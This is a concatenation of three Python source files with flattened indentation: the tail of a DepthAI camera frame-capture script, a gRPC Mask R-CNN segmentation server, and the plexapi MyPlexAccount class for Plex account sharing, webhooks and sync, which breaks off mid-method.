**self.ts_packets[ts_key]
})
self.last_paired_seq = key
self.last_paired_ts = ts_key
if len(results) > 0:
self.collect_garbage()
return results
def collect_garbage(self):
for key in list(self.seq_packets.keys()):
if key <= self.last_paired_seq:
del self.seq_packets[key]
for key in list(self.ts_packets.keys()):
if key <= self.last_paired_ts:
del self.ts_packets[key]
extract_frame = {
"left": lambda item: item.getCvFrame(),
"right": lambda item: item.getCvFrame(),
"color": lambda item: item.getCvFrame(),
"disparity": lambda item: cv2.applyColorMap(item.getFrame(), cv2.COLORMAP_JET),
}
frame_q = Queue()
def store_frames(in_q):
while True:
frames_dict = in_q.get()
if frames_dict is None:
return
frames_path = dest / Path(str(uuid4()))
frames_path.mkdir(parents=False, exist_ok=False)
for stream_name, item in frames_dict.items():
cv2.imwrite(str(frames_path / Path(f"{stream_name}.png")), item)
store_p = Process(target=store_frames, args=(frame_q, ))
store_p.start()
# Pipeline defined, now connect to the device
try:
with dai.Device() as device:
cams = device.getConnectedCameras()
depth_enabled = dai.CameraBoardSocket.LEFT in cams and dai.CameraBoardSocket.RIGHT in cams
ps = None
if depth_enabled:
ps = PairingSystem()
else:
PairingSystem.seq_streams = []
device.startPipeline(create_pipeline(depth_enabled))
qControl = device.getInputQueue('control')
ctrl = dai.CameraControl()
if args.autofocus:
ctrl.setAutoFocusMode(getattr(dai.CameraControl.AutoFocusMode, args.autofocus))
if args.manualfocus:
ctrl.setManualFocus(args.manualfocus)
if all(exposure):
ctrl.setManualExposure(*exposure)
qControl.send(ctrl)
cfg = dai.ImageManipConfig()
start_ts = monotonic()
while True:
for queueName in PairingSystem.seq_streams + PairingSystem.ts_streams:
packets = device.getOutputQueue(queueName).tryGetAll()
if ps is not None:
ps.add_packets(packets, queueName)
elif queueName == "color":
for packet in packets:
frame_q.put({"color": extract_frame[queueName](packet)})
if queueName == "color" and len(packets) > 0 and not args.prod:
cv2.imshow("preview", packets[-1].getCvFrame())
if ps is not None:
pairs = ps.get_pairs()
for pair in pairs:
extracted_pair = {stream_name: extract_frame[stream_name](item) for stream_name, item in pair.items()}
if not args.prod:
for stream_name, item in extracted_pair.items():
cv2.imshow(stream_name, item)
frame_q.put(extracted_pair)
if not args.prod and cv2.waitKey(1) == ord('q'):
break
if monotonic() - start_ts > args.time:
break
finally:
frame_q.put(None)
store_p.join()
|
mask_rcnn_server.py
|
import sys
import logging
import io
import grpc
import argparse
import os.path
import time
import concurrent.futures
import multiprocessing as mp
import skimage.io
from services import registry
import services.common
import services.service_spec.segmentation_pb2 as ss_pb
import services.service_spec.segmentation_pb2_grpc as ss_grpc
logging.basicConfig(level=10, format="%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s")
log = logging.getLogger(__package__ + "." + __name__)
class SegmentationServicer(ss_grpc.SemanticSegmentationServicer):
def __init__(self, q):
self.q = q
def segment(self, request, context):
# Marshal input
image = request.img.content
mimetype = request.img.mimetype
img_data = io.BytesIO(image)
img = skimage.io.imread(img_data)
# Drop alpha channel if it exists
if img.shape[-1] == 4:
img = img[:, :, :3]
log.debug("Dropping alpha channel from image")
self.q.send((img,))
result = self.q.recv()
if isinstance(result, Exception):
raise result
# Marshal output
pb_result = ss_pb.Result(
segmentation_img=[ss_pb.Image(content=i) for i in result["masks"]],
debug_img=ss_pb.Image(content=result["resultImage"]),
class_ids=[class_id for class_id in result["class_ids"]],
class_names=[n for n in result["class_names"]],
scores=[n for n in result["scores"]]
# known_classes=[n for n in result["known_classes"]],
)
return pb_result
def serve(dispatch_queue, max_workers=1, port=7777):
assert max_workers == 1, "No support for more than one worker"
server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=max_workers))
ss_grpc.add_SemanticSegmentationServicer_to_server(SegmentationServicer(dispatch_queue), server)
server.add_insecure_port("[::]:{}".format(port))
return server
def main_loop(dispatch_queue, grpc_serve_function, grpc_port, grpc_args=None):
if grpc_args is None:
grpc_args = dict()
server = None
if grpc_serve_function is not None:
server = grpc_serve_function(dispatch_queue, port=grpc_port, **grpc_args)
server.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
server.stop(0)
def worker(q):
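    # Each request is segmented inside a fresh single-worker Pool, presumably so
    # that the model's memory is released after every request instead of
    # accumulating in a long-lived process.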
while True:
try:
item = q.recv()
with mp.Pool(1) as p:
result = p.apply(services.common.segment_image, (item[0], True))
q.send(result)
except Exception as e:
q.send(e)
def main():
script_name = __file__
parser = argparse.ArgumentParser(prog=script_name)
server_name = os.path.splitext(os.path.basename(script_name))[0]
parser.add_argument("--grpc-port",
help="port to bind grpc services to",
default=registry[server_name]['grpc'],
type=int,
required=False)
args = parser.parse_args(sys.argv[1:])
# Need queue system and spawning grpc server in separate process because of:
# https://github.com/grpc/grpc/issues/16001
pipe = mp.Pipe()
p = mp.Process(target=main_loop, args=(pipe[0], serve, args.grpc_port))
p.start()
w = mp.Process(target=worker, args=(pipe[1],))
w.start()
p.join()
w.join()
if __name__ == "__main__":
main()
|
myplex.py
|
# -*- coding: utf-8 -*-
import copy
import threading
import time
from xml.etree import ElementTree
import requests
from plexapi import (BASE_HEADERS, CONFIG, TIMEOUT, X_PLEX_ENABLE_FAST_CONNECT,
X_PLEX_IDENTIFIER, log, logfilter, utils)
from plexapi.base import PlexObject
from plexapi.client import PlexClient
from plexapi.exceptions import BadRequest, NotFound, Unauthorized
from plexapi.library import LibrarySection
from plexapi.server import PlexServer
from plexapi.sonos import PlexSonosClient
from plexapi.sync import SyncItem, SyncList
from plexapi.utils import joinArgs
from requests.status_codes import _codes as codes
class MyPlexAccount(PlexObject):
""" MyPlex account and profile information. This object represents the data found Account on
the myplex.tv servers at the url https://plex.tv/users/account. You may create this object
directly by passing in your username & password (or token). There is also a convenience
method provided at :class:`~plexapi.server.PlexServer.myPlexAccount()` which will create
and return this object.
Parameters:
username (str): Your MyPlex username.
password (str): Your MyPlex password.
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
timeout (int): timeout in seconds on initial connect to myplex (default config.TIMEOUT).
Attributes:
SIGNIN (str): 'https://plex.tv/users/sign_in.xml'
key (str): 'https://plex.tv/users/account'
authenticationToken (str): Unknown.
certificateVersion (str): Unknown.
cloudSyncDevice (str): Unknown.
email (str): Your current Plex email address.
            entitlements (List<str>): List of devices you're allowed to use with this account.
guest (bool): Unknown.
home (bool): Unknown.
homeSize (int): Unknown.
id (str): Your Plex account ID.
locale (str): Your Plex locale
mailing_list_status (str): Your current mailing list status.
maxHomeSize (int): Unknown.
queueEmail (str): Email address to add items to your `Watch Later` queue.
queueUid (str): Unknown.
restricted (bool): Unknown.
            roles: (List<str>) List of account roles. Plexpass membership is listed here.
scrobbleTypes (str): Description
secure (bool): Description
            subscriptionActive (bool): True if your subscription is active.
subscriptionFeatures: (List<str>) List of features allowed on your subscription.
subscriptionPlan (str): Name of subscription plan.
subscriptionStatus (str): String representation of `subscriptionActive`.
thumb (str): URL of your account thumbnail.
title (str): Unknown. - Looks like an alias for `username`.
username (str): Your account username.
uuid (str): Unknown.
_token (str): Token used to access this client.
_session (obj): Requests session object used to access this client.
"""
FRIENDINVITE = 'https://plex.tv/api/servers/{machineId}/shared_servers' # post with data
HOMEUSERCREATE = 'https://plex.tv/api/home/users?title={title}' # post with data
EXISTINGUSER = 'https://plex.tv/api/home/users?invitedEmail={username}' # post with data
FRIENDSERVERS = 'https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}' # put with data
PLEXSERVERS = 'https://plex.tv/api/servers/{machineId}' # get
FRIENDUPDATE = 'https://plex.tv/api/friends/{userId}' # put with args, delete
REMOVEHOMEUSER = 'https://plex.tv/api/home/users/{userId}' # delete
REMOVEINVITE = 'https://plex.tv/api/invites/requested/{userId}?friend=0&server=1&home=0' # delete
REQUESTED = 'https://plex.tv/api/invites/requested' # get
REQUESTS = 'https://plex.tv/api/invites/requests' # get
SIGNIN = 'https://plex.tv/users/sign_in.xml' # get with auth
WEBHOOKS = 'https://plex.tv/api/v2/user/webhooks' # get, post with data
# Hub sections
VOD = 'https://vod.provider.plex.tv/' # get
WEBSHOWS = 'https://webshows.provider.plex.tv/' # get
NEWS = 'https://news.provider.plex.tv/' # get
PODCASTS = 'https://podcasts.provider.plex.tv/' # get
MUSIC = 'https://music.provider.plex.tv/' # get
# Key may someday switch to the following url. For now the current value works.
# https://plex.tv/api/v2/user?X-Plex-Token={token}&X-Plex-Client-Identifier={clientId}
key = 'https://plex.tv/users/account'
def __init__(self, username=None, password=None, token=None, session=None, timeout=None):
self._token = token
self._session = session or requests.Session()
self._sonos_cache = []
self._sonos_cache_timestamp = 0
data, initpath = self._signin(username, password, timeout)
super(MyPlexAccount, self).__init__(self, data, initpath)
def _signin(self, username, password, timeout):
if self._token:
return self.query(self.key), self.key
username = username or CONFIG.get('auth.myplex_username')
password = password or CONFIG.get('auth.myplex_password')
data = self.query(self.SIGNIN, method=self._session.post, auth=(username, password), timeout=timeout)
return data, self.SIGNIN
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self._token = logfilter.add_secret(data.attrib.get('authenticationToken'))
self._webhooks = []
self.authenticationToken = self._token
self.certificateVersion = data.attrib.get('certificateVersion')
self.cloudSyncDevice = data.attrib.get('cloudSyncDevice')
self.email = data.attrib.get('email')
self.guest = utils.cast(bool, data.attrib.get('guest'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.homeSize = utils.cast(int, data.attrib.get('homeSize'))
self.id = data.attrib.get('id')
self.locale = data.attrib.get('locale')
self.mailing_list_status = data.attrib.get('mailing_list_status')
self.maxHomeSize = utils.cast(int, data.attrib.get('maxHomeSize'))
self.queueEmail = data.attrib.get('queueEmail')
self.queueUid = data.attrib.get('queueUid')
self.restricted = utils.cast(bool, data.attrib.get('restricted'))
self.scrobbleTypes = data.attrib.get('scrobbleTypes')
self.secure = utils.cast(bool, data.attrib.get('secure'))
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title')
self.username = data.attrib.get('username')
self.uuid = data.attrib.get('uuid')
subscription = data.find('subscription')
self.subscriptionActive = utils.cast(bool, subscription.attrib.get('active'))
self.subscriptionStatus = subscription.attrib.get('status')
self.subscriptionPlan = subscription.attrib.get('plan')
self.subscriptionFeatures = []
for feature in subscription.iter('feature'):
self.subscriptionFeatures.append(feature.attrib.get('id'))
roles = data.find('roles')
self.roles = []
if roles:
for role in roles.iter('role'):
self.roles.append(role.attrib.get('id'))
entitlements = data.find('entitlements')
self.entitlements = []
for entitlement in entitlements.iter('entitlement'):
self.entitlements.append(entitlement.attrib.get('id'))
# TODO: Fetch missing MyPlexAccount attributes
self.profile_settings = None
self.services = None
self.joined_at = None
def device(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexDevice` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for device in self.devices():
if device.name.lower() == name.lower():
return device
raise NotFound('Unable to find device %s' % name)
def devices(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexDevice` objects connected to the server. """
data = self.query(MyPlexDevice.key)
return [MyPlexDevice(self, elem) for elem in data]
def _headers(self, **kwargs):
""" Returns dict containing base headers for all requests to the server. """
headers = BASE_HEADERS.copy()
if self._token:
headers['X-Plex-Token'] = self._token
headers.update(kwargs)
return headers
def query(self, url, method=None, headers=None, timeout=None, **kwargs):
method = method or self._session.get
timeout = timeout or TIMEOUT
log.debug('%s %s %s', method.__name__.upper(), url, kwargs.get('json', ''))
headers = self._headers(**headers or {})
response = method(url, headers=headers, timeout=timeout, **kwargs)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
message = '(%s) %s; %s %s' % (response.status_code, codename, response.url, errtext)
if response.status_code == 401:
raise Unauthorized(message)
elif response.status_code == 404:
raise NotFound(message)
else:
raise BadRequest(message)
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def resource(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexResource` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for resource in self.resources():
if resource.name.lower() == name.lower():
return resource
raise NotFound('Unable to find resource %s' % name)
def resources(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexResource` objects connected to the server. """
data = self.query(MyPlexResource.key)
return [MyPlexResource(self, elem) for elem in data]
def sonos_speakers(self):
if 'companions_sonos' not in self.subscriptionFeatures:
return []
t = time.time()
if t - self._sonos_cache_timestamp > 60:
self._sonos_cache_timestamp = t
data = self.query('https://sonos.plex.tv/resources')
self._sonos_cache = [PlexSonosClient(self, elem) for elem in data]
return self._sonos_cache
def sonos_speaker(self, name):
return next((x for x in self.sonos_speakers() if x.title.split("+")[0].strip() == name), None)
def sonos_speaker_by_id(self, identifier):
return next((x for x in self.sonos_speakers() if x.machineIdentifier == identifier), None)
def inviteFriend(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None).
[Section] must be defined in order to update shared sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
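Example (a hedged sketch; the email, server and section names are placeholders,
and `account` is assumed to be a :class:`~plexapi.myplex.MyPlexAccount`):
>>> plex = account.resource('<SERVER NAME>').connect()
>>> account.inviteFriend('friend@example.com', plex, sections=['Movies'],
...                      allowSync=True, filterMovies={'contentRating': ['PG-13']})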
"""
username = user.username if isinstance(user, MyPlexUser) else user
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': username},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
headers = {'Content-Type': 'application/json'}
url = self.FRIENDINVITE.format(machineId=machineId)
return self.query(url, self._session.post, json=params, headers=headers)
def createHomeUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None shares all sections).
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
headers = {'Content-Type': 'application/json'}
url = self.HOMEUSERCREATE.format(title=user)
# UserID needs to be created and referenced when adding sections
user_creation = self.query(url, self._session.post, headers=headers)
userIds = {}
for elem in user_creation.findall("."):
# Find userID
userIds['id'] = elem.attrib.get('id')
log.debug(userIds)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': userIds['id']},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
def createExistingUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None shares all sections).
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
headers = {'Content-Type': 'application/json'}
# If user already exists, carry over sections and settings.
if isinstance(user, MyPlexUser):
username = user.username
elif user in [_user.username for _user in self.users()]:
username = self.user(user).username
else:
# If the user does not already exist, treat the request as a new invite and include sections and settings.
newUser = user
url = self.EXISTINGUSER.format(username=newUser)
user_creation = self.query(url, self._session.post, headers=headers)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': newUser},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
url = self.EXISTINGUSER.format(username=username)
return self.query(url, self._session.post, headers=headers)
def removeFriend(self, user):
""" Remove the specified user from all sharing.
Parameters:
user (str): MyPlexUser, username, or email of the user to be removed.
"""
user = self.user(user)
url = self.FRIENDUPDATE if user.friend else self.REMOVEINVITE
url = url.format(userId=user.id)
return self.query(url, self._session.delete)
def removeHomeUser(self, user):
""" Remove the specified managed user from home.
Parameters:
user (str): MyPlexUser, username, email of the user to be removed from home.
"""
user = self.user(user)
url = self.REMOVEHOMEUSER.format(userId=user.id)
return self.query(url, self._session.delete)
def updateFriend(self, user, server, sections=None, removeSections=False, allowSync=None, allowCameraUpload=None,
allowChannels=None, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Update the specified user's share settings.
Parameters:
user (str): MyPlexUser, username, or email of the user to be updated.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None).
[Section] must be defined in order to update shared sections.
removeSections (Bool): Set True to remove all shares. Supersedes sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
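Example (a hedged sketch; the email and section names are placeholders, and `plex`
is assumed to be a connected :class:`~plexapi.server.PlexServer`):
>>> account.updateFriend('friend@example.com', plex, sections=['Movies', 'Music'],
...                      allowSync=True, filterTelevision={'label': ['kids']})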
"""
# Update friend servers
response_filters = ''
response_servers = ''
user = user if isinstance(user, MyPlexUser) else self.user(user)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
headers = {'Content-Type': 'application/json'}
# Determine whether user has access to the shared server.
user_servers = [s for s in user.servers if s.machineIdentifier == machineId]
if user_servers and sectionIds:
serverId = user_servers[0].id
params = {'server_id': machineId, 'shared_server': {'library_section_ids': sectionIds}}
url = self.FRIENDSERVERS.format(machineId=machineId, serverId=serverId)
else:
params = {'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': user.id}}
url = self.FRIENDINVITE.format(machineId=machineId)
# Remove share sections, add shares to user without shares, or update shares
if not user_servers or sectionIds:
if removeSections is True:
response_servers = self.query(url, self._session.delete, json=params, headers=headers)
elif 'invited_id' in params.get('shared_server', ''):
response_servers = self.query(url, self._session.post, json=params, headers=headers)
else:
response_servers = self.query(url, self._session.put, json=params, headers=headers)
else:
log.warning('A section name, number or section object is required to change library sections')
# Update friend filters
url = self.FRIENDUPDATE.format(userId=user.id)
params = {}
if isinstance(allowSync, bool):
params['allowSync'] = '1' if allowSync else '0'
if isinstance(allowCameraUpload, bool):
params['allowCameraUpload'] = '1' if allowCameraUpload else '0'
if isinstance(allowChannels, bool):
params['allowChannels'] = '1' if allowChannels else '0'
if isinstance(filterMovies, dict):
params['filterMovies'] = self._filterDictToStr(filterMovies or {})
if isinstance(filterTelevision, dict):
params['filterTelevision'] = self._filterDictToStr(filterTelevision or {})
if isinstance(filterMusic, dict):
params['filterMusic'] = self._filterDictToStr(filterMusic or {})
if params:
url += joinArgs(params)
response_filters = self.query(url, self._session.put)
return response_servers, response_filters
def user(self, username):
""" Returns the :class:`~plexapi.myplex.MyPlexUser` that matches the email or username specified.
Parameters:
username (str): Username, email or id of the user to return.
"""
for user in self.users():
# Home users don't have email, username etc.
if username.lower() == user.title.lower():
return user
elif (user.username and user.email and user.id and username.lower() in
(user.username.lower(), user.email.lower(), str(user.id))):
return user
raise NotFound('Unable to find user %s' % username)
def users(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexUser` objects connected to your account.
This includes both friends and pending invites. You can reference the user.friend to
distinguish between the two.
"""
friends = [MyPlexUser(self, elem) for elem in self.query(MyPlexUser.key)]
requested = [MyPlexUser(self, elem, self.REQUESTED) for elem in self.query(self.REQUESTED)]
return friends + requested
def _getSectionIds(self, server, sections):
""" Converts a list of section objects or names to sectionIds needed for library sharing. """
if not sections: return []
# Get a list of all section ids for looking up each section.
allSectionIds = {}
machineIdentifier = server.machineIdentifier if isinstance(server, PlexServer) else server
url = self.PLEXSERVERS.replace('{machineId}', machineIdentifier)
data = self.query(url, self._session.get)
for elem in data[0]:
allSectionIds[elem.attrib.get('id', '').lower()] = elem.attrib.get('id')
allSectionIds[elem.attrib.get('title', '').lower()] = elem.attrib.get('id')
allSectionIds[elem.attrib.get('key', '').lower()] = elem.attrib.get('id')
log.debug(allSectionIds)
# Convert passed in section items to section ids from above lookup
sectionIds = []
for section in sections:
sectionKey = section.key if isinstance(section, LibrarySection) else section
sectionIds.append(allSectionIds[sectionKey.lower()])
return sectionIds
def _filterDictToStr(self, filterDict):
""" Converts friend filters to a string representation for transport. """
values = []
for key, vals in filterDict.items():
if key not in ('contentRating', 'label'):
raise BadRequest('Unknown filter key: %s' % key)
values.append('%s=%s' % (key, '%2C'.join(vals)))
return '|'.join(values)
def addWebhook(self, url):
# copy _webhooks and append url
urls = self._webhooks[:] + [url]
return self.setWebhooks(urls)
def deleteWebhook(self, url):
urls = copy.copy(self._webhooks)
if url not in urls:
raise BadRequest('Webhook does not exist: %s' % url)
urls.remove(url)
return self.setWebhooks(urls)
def setWebhooks(self, urls):
log.info('Setting webhooks: %s' % urls)
data = {'urls[]': urls} if len(urls) else {'urls': ''}
data = self.query(self.WEBHOOKS, self._session.post, data=data)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def webhooks(self):
data = self.query(self.WEBHOOKS)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def optOut(self, playback=None, library=None):
""" Opt in or out of sharing stuff with plex.
See: https://www.plex.tv/about/privacy-legal/
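Example (a hedged sketch):
>>> account.optOut(playback=True, library=False)  # opt out of playback stats, keep library stats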
"""
params = {}
if playback is not None:
params['optOutPlayback'] = int(playback)
if library is not None:
params['optOutLibraryStats'] = int(library)
url = 'https://plex.tv/api/v2/user/privacy'
return self.query(url, method=self._session.put, data=params)
def syncItems(self, client=None, clientId=None):
""" Returns an instance of :class:`plexapi.sync.SyncList` for specified client.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client to query SyncItems for.
clientId (str): an identifier of a client to query SyncItems for.
If both `client` and `clientId` are provided, the client is preferred.
If neither `client` nor `clientId` is provided, the clientId defaults to the current client's identifier.
"""
if client:
clientId = client.clientIdentifier
elif clientId is None:
clientId = X_PLEX_IDENTIFIER
data = self.query(SyncList.key.format(clientId=clientId))
return SyncList(self, data)
def sync(self, sync_item, client=None, clientId=None):
""" Adds specified sync item for the client. It's always easier to use methods defined directly in the media
objects, e.g. :func:`plexapi.video.Video.sync`, :func:`plexapi.audio.Audio.sync`.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client for which you need to add SyncItem to.
clientId (str): an identifier of a client for which you need to add SyncItem to.
sync_item (:class:`plexapi.sync.SyncItem`): prepared SyncItem object with all fields set.
If both `client` and `clientId` are provided, the client is preferred.
If neither `client` nor `clientId` is provided, the clientId defaults to the current client's identifier.
Returns:
:class:`plexapi.sync.SyncItem`: an instance of created syncItem.
Raises:
:class:`plexapi.exceptions.BadRequest`: when the client with the provided clientId wasn't found.
:class:`plexapi.exceptions.BadRequest`: when the provided client doesn't provide `sync-target`.
"""
if not client and not clientId:
clientId = X_PLEX_IDENTIFIER
if not client:
for device in self.devices():
if device.clientIdentifier == clientId:
client = device
break
if not client:
raise BadRequest('Unable to find client by clientId=%s' % clientId)
if 'sync-target' not in client.provides:
raise BadRequest("Provided client doesn't provide sync-target")
params = {
'SyncItem[title]': sync_item.title,
'SyncItem[rootTitle]': sync_item.rootTitle,
'SyncItem[metadataType]': sync_item.metadataType,
'SyncItem[machineIdentifier]': sync_item.machineIdentifier,
'SyncItem[contentType]': sync_item.contentType,
'SyncItem[Policy][scope]': sync_item.policy.scope,
'SyncItem[Policy][unwatched]': str(int(sync_item.policy.unwatched)),
'SyncItem[Policy][value]': str(sync_item.policy.value if hasattr(sync_item.policy, 'value') else 0),
'SyncItem[Location][uri]': sync_item.location,
'SyncItem[MediaSettings][audioBoost]': str(sync_item.mediaSettings.audioBoost),
'SyncItem[MediaSettings][maxVideoBitrate]': str(sync_item.mediaSettings.maxVideoBitrate),
'SyncItem[MediaSettings][musicBitrate]': str(sync_item.mediaSettings.musicBitrate),
'SyncItem[MediaSettings][photoQuality]': str(sync_item.mediaSettings.photoQuality),
'SyncItem[MediaSettings][photoResolution]': sync_item.mediaSettings.photoResolution,
'SyncItem[MediaSettings][subtitleSize]': str(sync_item.mediaSettings.subtitleSize),
'SyncItem[MediaSettings][videoQuality]': str(sync_item.mediaSettings.videoQuality),
'SyncItem[MediaSettings][videoResolution]': sync_item.mediaSettings.videoResolution,
}
url = SyncList.key.format(clientId=client.clientIdentifier)
data = self.query(url, method=self._session.post, headers={
'Content-type': 'x-www-form-urlencoded',
}, params=params)
return SyncItem(self, data, None, clientIdentifier=client.clientIdentifier)
def claimToken(self):
""" Returns a str, a new "claim-token", which you can use to register your new Plex Server instance to your
account.
See: https://hub.docker.com/r/plexinc/pms-docker/, https://www.plex.tv/claim/
"""
response = self._session.get('https://plex.tv/api/claim/token.json', headers=self._headers(), timeout=TIMEOUT)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
return response.json()['token']
def history(self, maxresults=9999999, mindate=None):
""" Get Play History for all library sections on all servers for the owner.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
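Example (a hedged sketch):
>>> from datetime import datetime, timedelta
>>> account.history(mindate=datetime.now() - timedelta(days=30))  # last 30 days across owned servers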
"""
servers = [x for x in self.resources() if x.provides == 'server' and x.owned]
hist = []
for server in servers:
conn = server.connect()
hist.extend(conn.history(maxresults=maxresults, mindate=mindate, accountID=1))
return hist
def videoOnDemand(self):
""" Returns a list of VOD Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.VOD + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def webShows(self):
""" Returns a list of Webshow Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.WEBSHOWS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def news(self):
""" Returns a list of News Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.NEWS + 'hubs/sections/all', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def podcasts(self):
""" Returns a list of Podcasts Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.PODCASTS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def tidal(self):
""" Returns a list of tidal Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.MUSIC + 'hubs/', headers={'X-Plex-Token': self._token})
